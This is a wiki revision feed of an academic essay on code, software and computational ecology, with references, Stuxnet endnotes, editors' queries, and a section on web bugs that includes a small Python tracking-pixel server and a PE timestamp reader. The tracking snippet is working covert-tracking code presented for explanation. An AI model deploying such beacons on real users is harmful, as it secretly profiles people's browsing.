&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Chicago: Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and document object model storage (DOM Storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm, and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; careful analysis of images accidentally captured in the background of computers used by the president confirmed the importance of the cascade structure, the centrifuge layout and the enriching process, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.). There is, though, suspicion that there may have been three versions of the Stuxnet code, developed in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
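The compilation date is read straight out of the Windows executable format: every PE file carries a 32-bit TimeDateStamp in its COFF header. A short sketch of how such a stamp is extracted (the filename is a placeholder; this is the generic PE layout, not Stuxnet-specific code): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import datetime

def pe_compile_time(path):
    # Read the TimeDateStamp from a Windows PE file's COFF header.
    with open(path, 'rb') as f:
        data = f.read(4096)
    # Offset 0x3c of the DOS header points at the 'PE\0\0' signature;
    # the 32-bit TimeDateStamp sits 8 bytes after that signature.
    pe_offset = int.from_bytes(data[0x3C:0x40], 'little')
    stamp = int.from_bytes(data[pe_offset + 8:pe_offset + 12], 'little')
    return datetime.datetime.fromtimestamp(stamp, datetime.timezone.utc)

# e.g. pe_compile_time('sample.tmp') - the filename is a placeholder
&amp;lt;/pre&amp;gt; &lt;br /&gt;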
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious; for instance, Cryptome (2010) argues that it may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing on the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4695</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4695"/>
		<updated>2012-04-18T13:31:04Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al.'' have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], had we not already discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and one I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post)modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles which yield only to certain prescribed forms of touch-based interface. Here I am thinking of physical keyboards and trackpads, as much as haptic touch interfaces like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users has important privacy implications, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
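Mechanically, a web 1.0 bug requires very little: serve a one-pixel image, set or read a cookie, and log the request. The following toy server, written against Python’s standard library, makes the pattern visible (purely illustrative - real trackers are considerably more elaborate): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer

# A 1x1 transparent GIF: the classic invisible 'beacon' payload.
PIXEL = (b'GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!'
         b'\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00'
         b'\x00\x02\x02D\x01\x00;')

class WebBug(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = self.headers.get('Cookie')
        self.send_response(200)
        if cookie is None:
            # First visit: assign a persistent identifier to this browser.
            cookie = 'uid=' + uuid.uuid4().hex
            self.send_header('Set-Cookie', cookie)
        # 'State management' in action: every later page embedding this
        # pixel reports the same uid, page (via Referer) and browser.
        print(cookie, self.headers.get('Referer'), self.headers.get('User-Agent'))
        self.send_header('Content-Type', 'image/gif')
        self.send_header('Content-Length', str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

if __name__ == '__main__':
    HTTPServer(('localhost', 8000), WebBug).serve_forever()
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A page would then embed the pixel in exactly the shape of the EFF examples reproduced below, and every page carrying it reports the same persistent identifier back to the logging server. &lt;br /&gt;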
&lt;br /&gt;
